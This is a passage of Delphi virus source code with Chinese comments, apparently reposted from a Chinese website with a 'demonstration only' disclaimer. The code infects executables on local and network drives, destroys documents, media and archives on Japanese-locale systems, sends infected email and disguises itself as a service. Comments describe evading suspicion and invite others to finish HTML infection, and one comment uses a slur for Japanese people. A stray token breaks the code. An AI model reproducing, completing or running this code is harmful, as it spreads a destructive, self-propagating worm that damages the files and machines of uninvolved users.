.*
  begin
  D := Chr(i + 65);
  Str := D + ':\';
  DiskType := GetDriveType(PChar(Str));
  //得到本地磁盘和网络盘
  if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
  Result := Result + D;
  end;
  end;
  { 遍历目录,感染和摧毁文件 }
  procedure LoopFiles(Path, Mask: string);
  var
  i, Count: Integer;
  Fn, Ext: string;
  SubDir: TStrings;
  SearchRec: TSearchRec;
  Msg: TMsg;
  function IsValidDir(SearchRec: TSearchRec): Integer;
  begin
  if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
  (SearchRec.Name <> '..') then
  Result := 0 //不是目录
  else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
  (SearchRec.Name <> '..') then
  Result := 1 //不是根目录
  else Result := 2; //是根目录
  end;
  begin
  if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
  begin
  repeat
  PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
  if IsValidDir(SearchRec) = 0 then
  begin
  Fn := Path + SearchRec.Name;
  Ext := UpperCase(ExtractFileExt(Fn));
  if (Ext = '.EXE') or (Ext = '.SCR') then
  begin
  InfectOneFile(Fn); //感染可执行文件 
  end
  else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
  begin
  //感染HTML和ASP文件,将Base64编码后的病毒写入
  //感染浏览此网页的所有用户
  //哪位大兄弟愿意完成之?
  end
createprocessa
  else if Ext = '.WAB' then //Outlook地址簿文件
  begin
  //获取Outlook邮件地址
  end
  else if Ext = '.ADC' then //Foxmail地址自动完成文件
  begin
  //获取Foxmail邮件地址
  end
  else if Ext = 'IND' then //Foxmail地址簿文件
  begin
  //获取Foxmail邮件地址
  end
  else 
  begin
  if IsJap then //是倭文操作系统
  begin
  if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
  (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
  (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
  (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
  (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
  (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
  SmashFile(Fn); //摧毁文件
  end;
  end;
  end;
  //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
  Sleep(200);
  until (FindNext(SearchRec) <> 0);
  end;
  FindClose(SearchRec);
  SubDir := TStringList.Create;
  if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
  begin
  repeat
  if IsValidDir(SearchRec) = 1 then
  SubDir.Add(SearchRec.Name);
 until (FindNext(SearchRec) <> 0);
  end;
  FindClose(SearchRec);
  Count := SubDir.Count - 1;
  for i := 0 to Count do
  LoopFiles(Path + SubDir.Strings + '\', Mask);
  FreeAndNil(SubDir);
  end;
  { 遍历磁盘上所有的文件 }
  procedure InfectFiles;
  var
  DriverList: string;
  i, Len: Integer;
  begin
  if GetACP = 932 then //日文操作系统
  IsJap := True; //吧!
  DriverList := GetDrives; //得到可写的磁盘列表
  Len := Length(DriverList);
  while True do //死循环
  begin
  for i := Len downto 1 do //遍历每个磁盘驱动器
  LoopFiles(DriverList + ':\', '*.*'); //感染之
  SendMail; //发带毒邮件
  Sleep(1000 * 60 * 5); //睡眠5分钟
  end;
  end;
  { 主程序开始 }
  begin
  if IsWin9x then //是Win9x
  RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
  else //WinNT
  begin
  //远程线程映射到Explorer进程
  //
  end;
  //如果是原始病毒体自己
  if CompareText(ExtractFileName(ParamStr(0)), '') = 0 then
  InfectFiles //感染和发邮件
  else //已寄生于宿主程序并开始工作
  begin
  TmpFile := ParamStr(0); //创建临时文件
  Delete(TmpFile, Length(TmpFile) - 4, 4);
  TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
  ExtractFile(TmpFile); //分离之
  FillStartupInfo(Si, SW_SHOWDEFAULT);
  CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
  0, nil, '.', Si, Pi); //创建新进程运行之
  InfectFiles; //感染和发邮件
  end;
  end.
  CMD命令 shutdown -a //取消计算机中病毒后的倒记时关机。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。